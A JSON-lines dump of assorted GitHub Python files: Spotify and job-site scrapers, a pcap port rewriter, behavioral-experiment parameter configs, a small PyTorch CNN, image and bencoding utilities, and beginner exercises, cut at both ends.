track_info['name'] = track['name']\n track_info['date'] = track['album']['release_date']\n track_info['album_name'] = track['album']['name']\n track_info['artists'] = \", \".join([artist['name'] for artist in track['artists']])\n track_info['popularity'] = track['popularity']\n track_info['link'] = track['external_urls']['spotify']\n track_info['preview'] = track['preview_url']\n track_info['id'] = track['id']\n track_ids.append(track['id'])\n tracks.append(track_info)\n return tracks\n\ndef get_top_artist_info(sp, range):\n artists = []\n top_artists = sp.current_user_top_artists(time_range=range, limit=50)['items']\n for artist in top_artists:\n artist_info = {}\n artist_info['image'] = artist['images'][-1] if artist['images'] else False\n artist_info['name'] = artist['name']\n artist_info['followers'] = artist['followers']['total']\n artist_info['genres'] = \", \".join(artist['genres']).title\n artist_info['id'] = artist['id']\n artist_info['popularity'] = artist['popularity']\n artist_info['link'] = artist['external_urls']['spotify']\n artists.append(artist_info)\n return artists","repo_name":"timkimcool/spotify-playlister","sub_path":"spotify/scripts/user_top.py","file_name":"user_top.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"20930996232","text":"def clasificar():\n numP = 0\n numI = 0\n\n while True:\n try:\n num = int(input(\"Ingrese un número: \"))\n if (num != 0):\n if (num % 2 == 0):\n numP += 1\n else:\n numI += 1\n else:\n break\n except ValueError:\n print(\"Debe ingresar solo números\")\n continue\n return numP, numI\n\nnumP, numI = clasificar()\n\nprint(\"Números pares:\", numP, \"\\nNúmeros impares:\", numI)","repo_name":"Cristhian00/taller1-IA","sub_path":"punto2.py","file_name":"punto2.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14338524421","text":"#!/usr/bin/python\n\"\"\"\nTool to analyze some datalogger raw data\n\"\"\"\nfrom __future__ import print_function\nimport os\nimport sys\nimport argparse\nimport json\n\nparser = argparse.ArgumentParser(description=\"Tool to analyze some datalogger raw data\")\nparser.add_argument(\"-i\", \"--input-file\", help=\"file to read from\", required=True)\noptions = parser.parse_args(\"-i /var/rrd/snmp/raw/ifTable_2017-11-15.csv\".split())\nif not os.path.isfile(options.input_file):\n print(\"file %s does not exist\" % options.input_file)\n sys.exit(1)\ndata = {}\nmeta = {}\nmeta[\"delimiter\"] = \"\\t\"\nmeta[\"index_keynames\"] = (\"hostname\", \"ifDescr\")\nmeta[\"ts_keyname\"] = \"ts\"\nmeta[\"interval\"] = 300\nheaders = None\nwith open(options.input_file, \"rt\") as infile:\n for line in infile.read().split(\"\\n\"):\n if line == \"\" or line == \"\\n\":\n continue\n if headers is None:\n headers = line.split(meta[\"delimiter\"])\n meta[\"headers\"] = headers\n data[\"length\"] = len(headers)\n for header in headers:\n data[header] = {\n \"isnumeric\" : True,\n \"interval\" : 0\n }\n assert meta[\"ts_keyname\"] in headers\n assert all((index_key in headers for index_key in meta[\"index_keynames\"]))\n else:\n columns = line.split(meta[\"delimiter\"])\n assert len(columns) == data[\"length\"]\n for index, column in enumerate(columns):\n data[headers[index]][\"isnumeric\"] = all((data[headers[index]][\"isnumeric\"], column.isnumeric()))\n print(line)\nmeta[\"value_keynames\"] = dict([(header, \"asis\") for header in headers if data[header][\"isnumeric\"] == True])\nmeta[\"blacklist\"] = [header for header in headers if (data[header][\"isnumeric\"] == False) and (header not in meta[\"index_keynames\"]) and (header != meta[\"ts_keyname\"])]\nprint(json.dumps(meta, indent=4, sort_keys=True))\n","repo_name":"gunny26/datalogger","sub_path":"development/analyze_table.py","file_name":"analyze_table.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6151934485","text":"\"\"\"\nPreprocess the data derived from Antigoni Maria Founta et al.\n\nThis script is ran only once and binarizes the dataset\n\"\"\"\n\nimport pandas as pd\nimport sys\n\ndata_file = sys.argv[1]\noutput_file = sys.argv[2]\n\ncolumns = [\"Tweet\", \"Orig_Label\", \"Vote\"]\ndata = pd.read_csv(data_file, sep=None, names=columns, engine='python')\ndata[\"label\"] = data[\"Orig_Label\"] == \"hateful\"\ndata.to_csv(output_file, header=True, index=False)\n","repo_name":"SamSoup/DkNN","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2095293393","text":"from bs4 import BeautifulSoup\nimport requests\nimport csv\nfrom itertools import zip_longest\n\n#/home/rasmesxiii/Documents/forproject.csv\n\njob_name = []\njob_skills = []\n\n# use requests to fetch URL\nweb = requests.get(\"https://wuzzuf.net/search/jobs/?q=django+developer&a=navbg\")\n\n# save page content\nsource = web.content\n\nsoup = BeautifulSoup(source, 'lxml') # require 2 prameter(web source, lxml module) secrch for lxml to know what does it do\n\n\njob_name = soup.find_all(\"a\", {\"class\":\"css-o171kl\"})\njob_skills = soup.find_all('a',{'class':'css-o171kl'})\ncompany = soup.find_all()\nlocation = soup.find_all()\n# print(job_name)\n\nfor i in range(len(job_name)) :\n job_name.append(job_name[i].text)\n job_skills.append(job_skills[i].text)\n\n print(job_name)\n\n # print(f'{job_name} required skills : \\n {job_skills}')\n\n# for job in job_skills :\n\n# print(f'{job} ')\n\n\n","repo_name":"osamoxdev/My-old-projects","sub_path":"Python_projects/web_scrapping.py","file_name":"web_scrapping.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7531587125","text":"def main():\n time = str(input(\"What time is it? \")).lower().replace(\" \", \":\")\n if \"p.m.\" in time:\n time = format12pm(time)\n elif \"a.m.\" in time:\n time = format12am(time)\n else:\n time = format24(time)\n\ndef eatingTime(x):\n if 7 <= x <= 8:\n print(\"breakfast time\")\n elif 12 <= x <= 13:\n print(\"lunch time\")\n elif 18 <= x <= 19:\n print(\"dinner time\")\n return(x)\n\n\ndef format24(x):\n x = x.split(\":\")\n h = float(x[0])\n m = float(x[1])\n x = round((h + (m / 60)), 2)\n eatingTime(x)\n\ndef format12pm(x):\n x = x.split(\":\")\n h = float(x[0])\n m = float(x[1])\n if h == 12:\n h = 0\n return\n x = round(((h + 12) + (m / 60)), 2)\n eatingTime(x)\n\ndef format12am(x):\n x = x.split(\":\")\n h = float(x[0])\n m = float(x[1])\n if h == 12:\n h = 0\n return()\n x = round((h + (m / 60)), 2)\n eatingTime(x)\n\nif __name__ == \"__main__\":\n main()","repo_name":"xpall/edx-cs50p-psets-clone","sub_path":"PSetScratch/meal2.py","file_name":"meal2.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25312963194","text":"#!/bin/python3\nimport sys\n\"\"\"\n# Description\n# \n# Given an array of strings, return another array containing all of its longest\n# strings.\n#\n# Example:\n# \n# For inputArray = [\"aba\", \"aa\", \"ad\", \"vcd\", \"aba\"], the output should be\n# allLongestStrings(inputArray) = [\"aba\", \"vcd\", \"aba\"].\n#\n# Input Format\n#\n# array.string inputArray, A non-empty array.\n# 1 ≤ inputArray.length ≤ 10,\n# 1 ≤ inputArray[i].length ≤ 10.\n#\n# Output Format \n#\n# Array of the longest strings, stored in the same order as in the inputArray.\n#\n# Solution:\n\"\"\"\n##############\n# SOLUTION 1 #\n##############\ndef allLongestStrings(inputArray):\n L = []\n maxLen = 0\n for i in range(len(inputArray)):\n if len(inputArray[i]) == maxLen:\n L.append(inputArray[i])\n elif len(inputArray[i]) > maxLen:\n maxLen = len(inputArray[i])\n del L[:]\n L.append(inputArray[i])\n return L\n\nA = [\"aba\", \"aa\", \"ad\", \"vcd\", \"aba\"]\nprint(allLongestStrings(A))","repo_name":"henrypj/codefights","sub_path":"Intro/03-SmoothSailing/allLongestStrings.py","file_name":"allLongestStrings.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15869107515","text":"# -*- coding: utf-8 -*-\n\nimport pytest\nfrom firstuseauthenticator import FirstUseAuthenticator\n\ndef pytest_addoption(parser):\n group = parser.getgroup('jup_hub')\n group.addoption(\n '--foo',\n action='store',\n dest='dest_foo',\n default='2022',\n help='Set the value for the fixture \"bar\".'\n )\n\n parser.addini('HELLO', 'Dummy pytest.ini setting')\n\n\n@pytest.fixture\ndef bar(request):\n return request.config.option.dest_foo\n\n\n@pytest.fixture\ndef firstuseauthenticator_configured():\n \"\"\"firstuseauthenticator object with min_password_length set to 10\"\"\"\n auth = FirstUseAuthenticator()\n auth.min_password_length = 10\n return auth","repo_name":"Sheila-nk/pytest-jup_hub","sub_path":"pytest_jup_hub.py","file_name":"pytest_jup_hub.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34991927508","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Change the port in a pcap file\"\"\"\n\nimport argparse\n\nfrom scapy.all import UDP, rdpcap, wrpcap\n\n\ndef change_port(packets, port, output_file):\n for packet in packets:\n if packet.haslayer(UDP):\n packet[UDP].dport = port\n wrpcap(output_file, packet, append=True)\n\n\ndef main():\n argparser = argparse.ArgumentParser(description=\"pcap Port Change\")\n argparser.add_argument(\n \"input\", type=argparse.FileType(\"r\"), help=\"Input pcap trace file\"\n )\n argparser.add_argument(\n \"--port\",\n \"-p\",\n type=int,\n default=36001,\n help=\"Port to use. Default: 36001\",\n )\n argparser.add_argument(\n \"--output\",\n \"-o\",\n type=argparse.FileType(\"w\"),\n help=\"Output pcap file name. Default: new_port.pcap\",\n default=\"new_port.pcap\",\n )\n args = argparser.parse_args()\n change_port(rdpcap(args.input.name), args.port, args.output.name)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ska-telescope/ska-low-cbf-cnic-sw","sub_path":"src/ska_low_cbf_sw_cnic/change_port.py","file_name":"change_port.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38272745665","text":"'''\nDefine parameters for different subjects\n'''\n### globals()[pardict['subject']] = pardict.copy()\n\n\ntest000 = {'targetDuration':0.2, 'targetIntensityMode':'fixed',\n 'targetMaxIntensity':80,\n 'highFreq':2100, 'midFreq':1400,'lowFreq':1000, 'trialsPerBlock':3,\n 'punishSoundAmplitude':0.1} #, 'outcomeMode':'simulated'\n\nfrequencySet5to24 = {'lowFreq':5000,'midFreq':11000,'highFreq':24000}\nfrequencySet6to19 = {'lowFreq':6200,'midFreq':11000,'highFreq':19200}\nfrequencySet3to16 = {'lowFreq':3000,'midFreq':7000,'highFreq':16000}\nfrequencySet4to13 = {'lowFreq':3800,'midFreq':7000,'highFreq':12600}\n\n# ======== Adaptive categorization task ========\nsidesDirectMode = {'outcomeMode':'sides_direct', 'delayToTargetMean':0, 'delayToTargetHalfRange':0,\n 'currentBlock':'mid_boundary'}\ndirectMode = {'outcomeMode':'direct', 'delayToTargetMean':0, 'delayToTargetHalfRange':0,\n 'currentBlock':'mid_boundary'}\nincreaseDelayMode = {'outcomeMode':'on_next_correct', 'delayToTargetMean':0, 'delayToTargetHalfRange':0,\n 'currentBlock':'mid_boundary', 'automationMode':'increase_delay', 'targetDuration':0.05,\n 'antibiasMode':'repeat_mistake'}\n\nbasicDiscriminationMode = {'delayToTargetMean':0.2,'currentBlock':'mid_boundary'}\n\n#onNextCorrectMode = {'outcomeMode':'on_next_correct', 'delayToTargetMean':0.2, 'delayToTargetHalfRange':0.05,\n# 'currentBlock':'mid_boundary', 'targetDuration':0.1,'targetMaxIntensity':80,'lowFreq':4000,'highFreq':13000}\n\npsyCurveMidBound = {'trialsPerBlock':2000,'punishTimeError':4,'delayToTargetMean':0.2,\n 'currentBlock':'mid_boundary','psycurveMode':'uniform','psycurveNfreq':6}\n\nswitchDailyMode = {'trialsPerBlock':2000,'punishTimeError':4,'delayToTargetMean':0.2}\n\nswitchBlocksMode = {'punishTimeError':4, 'delayToTargetMean':0.2,'trialsPerBlock':200,}\n\nstayBlockMode = {'punishTimeError':4, 'delayToTargetMean':0.2,'trialsPerBlock':2000,}\n\n#pardict.update({'antibiasMode':'repeat_mistake'})\n#pardict.update(basicDiscriminationMode)\n\n\n\n##############################################################################################################\n\ntest086frequency = {'lowFreq':7200,'midFreq':11000,'highFreq':15000}\ntest053frequency = {'lowFreq':6000,'midFreq':14000,'highFreq':19200}\nfixIntensity = {'targetIntensityMode':'fixed','targetMaxIntensity':50}\n\npardict = {'subject':'test086','experimenter':'santiago'}\npardict.update(psyCurveMidBound)\npardict.update(test086frequency)\npardict.update(fixIntensity)\npardict.update({'punishTimeEarly':0,'punishSoundAmplitude':0.01})\ntest086 = pardict.copy()\n\npardict = {'subject':'test053','experimenter':'santiago'}\npardict.update(stayBlockMode)\npardict.update({'currentBlock':'low_boundary'})\npardict.update(test053frequency)\npardict.update(fixIntensity)\npardict.update({'punishTimeEarly':0,'punishSoundAmplitude':0.01})\ntest053 = pardict.copy()\n\npardict = {'subject':'test059','experimenter':'santiago'}\npardict.update(switchBlocksMode)\npardict.update(frequencySet6to19)\npardict.update({'punishTimeEarly':0,'punishSoundAmplitude':0.01})\npardict.update(fixIntensity)\ntest059 = pardict.copy()\n'''\n#started on psycurve 2015-11-28\ntest087frequency = {'lowFreq':6200,'midFreq':10000,'highFreq':18000}\npardict = {'subject':'test087','experimenter':'santiago'}\npardict.update(switchBlocksMode)\npardict.update(test087frequency)\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.03})\npardict.update(fixIntensity)\ntest087 = pardict.copy()\n'''\n#test087frequency = {'lowFreq':8900,'midFreq':9100,'highFreq':9900}\ntest087frequency = {'lowFreq':9000,'midFreq':9200,'highFreq':9700}\npardict = {'subject':'test087','experimenter':'santiago'}\npardict.update(psyCurveMidBound)\npardict.update(test087frequency)\npardict.update(fixIntensity)\npardict.update({'punishTimeEarly':0,'punishSoundAmplitude':0.01})\ntest087 = pardict.copy()\n\ntest089frequency = {'lowFreq':6200,'midFreq':9000,'highFreq':17000}\npardict = {'subject':'test089','experimenter':'santiago'}\npardict.update(switchBlocksMode)\n#pardict.update({'currentBlock':'low_boundary'})\npardict.update(test089frequency)\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.03})\npardict.update({'delayToTargetMean':0.13, 'delayToTargetHalfRange':0.02})\npardict.update(fixIntensity)\ntest089 = pardict.copy()\n\n\nfirstAdapMice = {'delayToTargetMean':0.2,'trialsPerBlock':300}\n'''\npardict = {'subject':'adap002','experimenter':'santiago'}\npardict.update(firstAdapMice)\npardict.update(frequencySet6to19)\npardict.update({'punishTimeEarly':0.2,'punishSoundAmplitude':0.03})\npardict.update({'punishTimeError':4})\nadap002 = pardict.copy()\n'''\n#adap004frequency = {'lowFreq':6200,'midFreq':10000,'highFreq':19200}\nadap004frequency = {'lowFreq':7200,'midFreq':10000,'highFreq':13600}#updated 2015-12-19\npardict = {'subject':'adap004','experimenter':'santiago'}\npardict.update(psyCurveMidBound)\npardict.update(adap004frequency)\npardict.update(fixIntensity)\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.03})\npardict.update({'punishTimeError':4})\nadap004 = pardict.copy()\n'''\n#Switch to psychometric curve as of 2015-12-02\npardict = {'subject':'adap004','experimenter':'santiago'}\npardict.update(firstAdapMice)\npardict.update(adap004frequency)\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.03})\npardict.update({'punishTimeError':4})\npardict.update(fixIntensity)\nadap004 = pardict.copy()\n'''\n\nadap002frequency = {'lowFreq':6800,'midFreq':11000,'highFreq':16000}\n\npardict = {'subject':'adap002','experimenter':'santiago'}\npardict.update(psyCurveMidBound)\npardict.update(adap002frequency)\npardict.update(fixIntensity)\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.03})\npardict.update({'punishTimeError':4})\nadap002 = pardict.copy()\n\n\npardict = {'subject':'adap010','experimenter':'santiago'}\npardict.update(switchBlocksMode)\npardict.update(frequencySet5to24)\npardict.update(fixIntensity)\n#pardict.update({'antibiasMode':'repeat_mistake'})\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.01})\npardict.update({'punishTimeError':4})\nadap010 = pardict.copy()\n\nadap3 = psyCurveMidBound\nadap3.update({'delayToTargetMean':0.2})\n\npardict = {'subject':'adap015','experimenter':'santiago'}\npardict.update(adap3)\npardict.update({'lowFreq':6200,'highFreq':17000})\npardict.update(fixIntensity)\n#pardict.update({'antibiasMode':'repeat_mistake'})\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.01})\nadap015 = pardict.copy()\n\npardict = {'subject':'adap013','experimenter':'santiago'}\npardict.update(adap3)\npardict.update({'lowFreq':9000,'highFreq':12000})\npardict.update(fixIntensity)\n#pardict.update({'antibiasMode':'repeat_mistake'})\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.01})\nadap013 = pardict.copy()\n\npardict = {'subject':'adap017','experimenter':'santiago'}\npardict.update(adap3)\npardict.update({'lowFreq':7000,'highFreq':17000})\npardict.update(fixIntensity)\n#pardict.update({'antibiasMode':'repeat_mistake'})\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.01})\nadap017 = pardict.copy()\n\n#######################################################################################################\n#######################################################################################################\n#FOR REWARD CHANGE MICE\n#######################################################################################################\n#######################################################################################################\n\n#'currentBlock':'more_right',\npsyCurveChangeReward = {'punishTimeError':4,\n 'delayToTargetMean':0.2,\n 'psycurveMode':'off',\n 'automationMode':'left_right_left',\n 'punishTimeEarly':0.5,\n 'punishSoundAmplitude':0.01,\n 'targetIntensityMode':'fixed',\n 'baseWaterValveL':0.015,\n 'baseWaterValveR':0.015,\n 'factorWaterValveL':4,\n 'factorWaterValveR':4,\n 'currentBlock':'more_left'}\n\n\npardict = {'subject':'adap015','experimenter':'billy'}\npardict.update(psyCurveChangeReward)\npardict.update({'trialsPerBlock':150})\npardict.update({'lowFreq':6200,'highFreq':17000})\nadap015reward = pardict.copy()\n\npardict = {'subject':'adap013','experimenter':'billy'}\npardict.update(psyCurveChangeReward)\npardict.update({'trialsPerBlock':150})\npardict.update({'lowFreq':8000,'highFreq':14000})\nadap013reward = pardict.copy()\n\npardict = {'subject':'adap017','experimenter':'billy'}\npardict.update(psyCurveChangeReward)\npardict.update({'trialsPerBlock':150})\npardict.update({'lowFreq':7000,'highFreq':17000})\nadap017reward = pardict.copy()\n\n\n\n#######################################################################################################\n#######################################################################################################\n\n\npardict = {'subject':'adap020','experimenter':'santiago'}\npardict.update(switchBlocksMode)\n#pardict.update(frequencySet6to19)\npardict.update({'lowFreq':6200,'midFreq':12000,'highFreq':19200})\npardict.update({'currentBlock':'low_boundary'})\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.01})\npardict.update(fixIntensity)\npardict.update({'punishTimeError':4})\npardict.update({'trialsPerBlock':250})\nadap020 = pardict.copy()\n\n#pardict = {'subject':'adap024','experimenter':'santiago'}\n#pardict.update(switchBlocksMode)\n#pardict.update(frequencySet6to19)\n#pardict.update({'currentBlock':'low_boundary'})\n#pardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.01})\n#pardict.update(fixIntensity)\n#pardict.update({'punishTimeError':4})\n#pardict.update({'trialsPerBlock':200})\n#adap024 = pardict.copy()\n\npardict = {'subject':'adap024','experimenter':'santiago'}\npardict.update(adap3)\npardict.update({'lowFreq':8500,'highFreq':13000})\npardict.update(fixIntensity)\n#pardict.update({'antibiasMode':'repeat_mistake'})\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.01})\nadap024 = pardict.copy()\n\n#pardict = {'subject':'adap021','experimenter':'santiago'}\n#pardict.update(switchBlocksMode)\n#pardict.update(frequencySet6to19)\n##pardict.update({'currentBlock':'high_boundary'})\n#pardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.03})\n##pardict.update(fixIntensity)\n#pardict.update({'punishTimeError':4})\n#pardict.update({'trialsPerBlock':400})\n#adap021 = pardict.copy()\n\npardict = {'subject':'adap021','experimenter':'santiago'}\npardict.update(adap3)\npardict.update({'lowFreq':6200,'highFreq':19200})\n#pardict.update(fixIntensity)\n#pardict.update({'antibiasMode':'repeat_mistake'})\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.03})\nadap021 = pardict.copy()\n","repo_name":"sjara/jaratest","sub_path":"billy/scripts/params.billy.py","file_name":"params.billy.py","file_ext":"py","file_size_in_byte":10856,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73117838567","text":"'''\nimport sys\n#Page 115\nscript, input_encoding, error = sys.argv #Why do we need use name of module sys.\n\ndef main(language_file, encoding, errors):\n line = language_file.readline() #Takes line from object\n\n if line:\n print_line(line, encoding, errors)\n return main(language_file, encoding, errors)\n\n#Function which prints line\ndef print_line(line, encoding, errors):\n next_lang = line.strip() #Q: What .strip() does A: https://www.programiz.com/python-programming/methods/string/strip\n raw_bytes = next_lang.encode(encoding, errors = errors) # .encode()\n cooked_string = raw_bytes.decode(encoding, errors = errors) # .decode()\n\n print(raw_bytes, \"<===>\", cooked_string)\n\n#1. converting lang..txt to lang.. object\nlanguages = open(\"languages.txt\", encoding = \"utf-8\")\n\nmain(languages, input_encoding, error)\n'''\n\n\nimport sys\n\nscript, txt_file = sys.argv\n\ndef main(ob_f, encoding, er):\n string_printer(ob_f, encoding, er)\n return main(ob_f, encode, error)\n\ndef string_printer(ob, encode, err):\n single_string = ob.readline()\n raw_byte = single_string.encode(encoding=encode, errors=err)\n cooked_byte = single_string.decode(encode, errors=err)\n\n print(cooked_byte, \"<===>\", raw_byte)\n\n\nobj_file = open(txt_file, encoding=\"utf-8\")\nmain(obj_file, \"utf-8\", \"strict\")\n","repo_name":"MasonTwoK/Python_Hard_way_exercises","sub_path":"ex23/ex23.py","file_name":"ex23.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24381190186","text":"import requests\nimport bs4\nimport json\nfrom threading import Thread\n\n\ndef extracting_information(tab,out):\n\n list_of_links = [] # this is a list for all the links in a single department\n [list_of_links.append(i.get('href')) for i in soup.select('div {} .clickable-row a'.format(tab))]\n\n for dep_link in list_of_links:\n request = requests.get(dep_link)\n soup2 = bs4.BeautifulSoup(request.text, 'lxml')\n\n description_of_job = {'title': '', 'location': '', 'description': [], 'qualification': [], 'posted by': ''}\n\n description_of_job['title'] = soup2.find_all(class_='job-title')[0].text\n description_of_job['location'] = soup2.find_all('span', class_='job-detail')[0].text\n [description_of_job['description'].append(de.text) for de in soup2.select('#st-jobDescription .wysiwyg ul li')]\n [description_of_job['qualification'].append(qu.text) for qu in soup2.select('#st-qualifications .wysiwyg ul li')]\n try:\n description_of_job['posted by'] = soup2.select('.details h3')[0].text\n except IndexError:\n description_of_job['posted by'] = 'NULL'\n\n output[out].append(description_of_job)\n\n\nreq = requests.get('https://www.cermati.com/karir')\nsoup = bs4.BeautifulSoup(req.text, 'lxml')\n\noutput = {}\noutput1 = [] # creating the list for the departments for looping purpose\ndep = soup.find_all('h4', class_='tab-title') # selecting the departments code and adding into the output dictionary\nfor i in dep: # selecting only the text from that code\n output[i.text] = []\n output1.append(i.text)\n\ntabs = [] # this is a list of id's of departments from html code\n[tabs.append(i.get('href')) for i in soup.select('div .col-xs-2 a')]\n\nli = []\n\nfor i in range(len(tabs)):\n li.append(Thread(target=extracting_information, args=(tabs[i], output1[i],))) # creating a thread for each department\n li[i].start() # starting the thread simultaneously\n\nfor i in range(len(li)):\n li[i].join() # making the main thread to wait for all the other threads we had started\n\nprint(output)\nwith open('solution.json', 'w') as creating_file:\n json.dump(output, creating_file)\n","repo_name":"vkjangid/cermati_assignment","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31005960788","text":"import torch\nfrom torch import nn\nfrom torch.utils.tensorboard import SummaryWriter\n\n\nclass xxNet(nn.Module):\n def __init__(self, input_channels, output_channels):\n super(xxNet, self).__init__()\n # 初始化一些参数(opt)\n self.input_channels = input_channels\n self.output_channels = output_channels\n\n # 网络中需要的层(可单独写,如果大量的重复可以封装成Sequential变成一个模块)\n self.model = nn.Sequential(\n nn.Conv2d(input_channels, 64, 5, 1, 2),\n nn.MaxPool2d(2),\n nn.Conv2d(64, 128, 5, 1, 2),\n nn.MaxPool2d(2),\n nn.Conv2d(128, 256, 5, 1, 2),\n nn.MaxPool2d(2),\n nn.Conv2d(256, 512, 5, 1, 2),\n nn.MaxPool2d(2),\n )\n\n # 前向传播\n def forward(self, x):\n x = self.model(x)\n return x\n\n\n# 创建一个实例去验证一下网络模型搭建是否有问题,同时也可以去反向计算一些层的参数是什么,例如linear层\nif __name__ == '__main__':\n writer = SummaryWriter(\"../logs/model_logs\")\n\n net = xxNet(input_channels=1, output_channels=2)\n print(net)\n\n input = torch.ones((1, 3, 32, 32))\n output = net(input)\n print(output.shape)\n\n writer.add_graph(net, input)\n writer.close()","repo_name":"Aiden-Kan/dl_template","sub_path":"model/xxNet.py","file_name":"xxNet.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38133782907","text":"import cv2\nimport os.path\nimport glob\nimport numpy as np\ndef img_cut_multiple(jpgfile,outdir):\n img=cv2.imread(jpgfile,cv2.IMREAD_ANYCOLOR)\n img=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n imgInfo=img.shape\n height=imgInfo[0]\n width=imgInfo[1]\n pts1 = np.float32([[0,0],[0,height-1],[width-1,height-1],[width-1,0]])\n pts2 = np.float32([[300,300],[0,height-1],[width-100,height-100],[width-1,0]])\n M = cv2.getPerspectiveTransform(pts1, pts2)\n dst = cv2.warpPerspective(img, M, (2500, 2500))\n\n cv2.imwrite(os.path.join(outdir, os.path.basename(jpgfile)), dst)\n\n\nfor jpgfile in glob.glob(r'C:\\Users\\Joker\\Desktop\\DL\\aa\\y\\*.jpg'):\n img_cut_multiple(jpgfile, r'C:\\Users\\Joker\\Desktop\\cv2')\n","repo_name":"AxCJoe/PythonStartLab","sub_path":"opencv画像処理/射影変換処理.py","file_name":"射影変換処理.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39183480085","text":"\n\nclass Decoding:\n def __init__(self, filename):\n self.final_list = []\n self.in_file = open(self.filename, \"r\")\n\n def decode_string(self, length):\n string_read = \"\"\n if not(length == 0):\n for count in range(length):\n string_read += self.in_file.read(1)\n return string_read.encode('ascii')\n\n def decode_int(self):\n int_ascii_read = \"\"\n while True:\n character = self.in_file.read(1)\n if character == 'e':\n break\n int_ascii_read += character\n return int(int_ascii_read)\n\n def decode(self):\n while True:\n character = self.in_file.read(1) #read 1 byte a time\n if not character: #end of file\n break\n if character.isdigit():\n self.final_list.append(self.decode_string(int(character)))\n if character == 'l':\n self.final_list.append(self.decode_list())\n if character == 'd':\n self.final_list.append(self.decode_dict())\n if character == 'i':\n self.final_list.append(self.decode_int())","repo_name":"mmshress/PyBitTorrent","sub_path":"bencoding.py","file_name":"bencoding.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42011912868","text":"import numpy as np\r\nimport os\r\n\r\n\r\ndef getPSNR(x, y):\r\n max_val = 1.0\r\n mse = np.mean(np.square(x - y))\r\n psnr = 10 * np.log10(max_val / mse + 1e-8)\r\n return psnr\r\n\r\n\r\ndef getSAM(x, y):\r\n x_y = np.sum(np.multiply(x, y), axis=1)\r\n x_norm = np.sqrt(np.sum(x ** 2, axis=1))\r\n y_norm = np.sqrt(np.sum(y ** 2, axis=1))\r\n\r\n cosin_value = x_y / (x_norm * y_norm + 1e-8)\r\n cosin_value = np.arccos(np.clip(cosin_value, -1, 1))\r\n angle = cosin_value / np.pi * 180\r\n\r\n return np.mean(angle)\r\n\r\n\r\ndef checkFile(path):\r\n '''\r\n if filepath not exist make it\r\n :param path:\r\n :return:\r\n '''\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n\r\n\r\ndef standard(X):\r\n max_value = np.max(X)\r\n min_value = np.min(X)\r\n if max_value == min_value:\r\n return X\r\n return (X - min_value) / (max_value - min_value)\r\n","repo_name":"shendb2022/HTD-IRN","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"24361163179","text":"\"\"\"Helmholtz dataset\"\"\"\nimport os\nimport torch\nfrom ffcv.loader import Loader, OrderOption\nfrom ffcv.fields.decoders import NDArrayDecoder\nfrom ffcv.transforms import ToTensor\nfrom wavebench import wavebench_dataset_path\n\nhelmholtz_dataset_path = os.path.join(\n wavebench_dataset_path, \"time_harmonic/\")\n\ndef get_dataloaders_helmholtz(\n kernel_type='isotropic',\n frequency=10,\n train_batch_size=1,\n eval_batch_size=1,\n num_train_samples=49000,\n num_val_samples=500,\n num_test_samples=500,\n num_workers=1,\n is_elastic=False\n ):\n \"\"\"Prepare loaders of the Helmholtz dataset.\n\n Args:\n kernel_type: can be `isotropic` or `anisotropic`.\n frequency: can be 10, 15, 20, 40 [Hz].\n 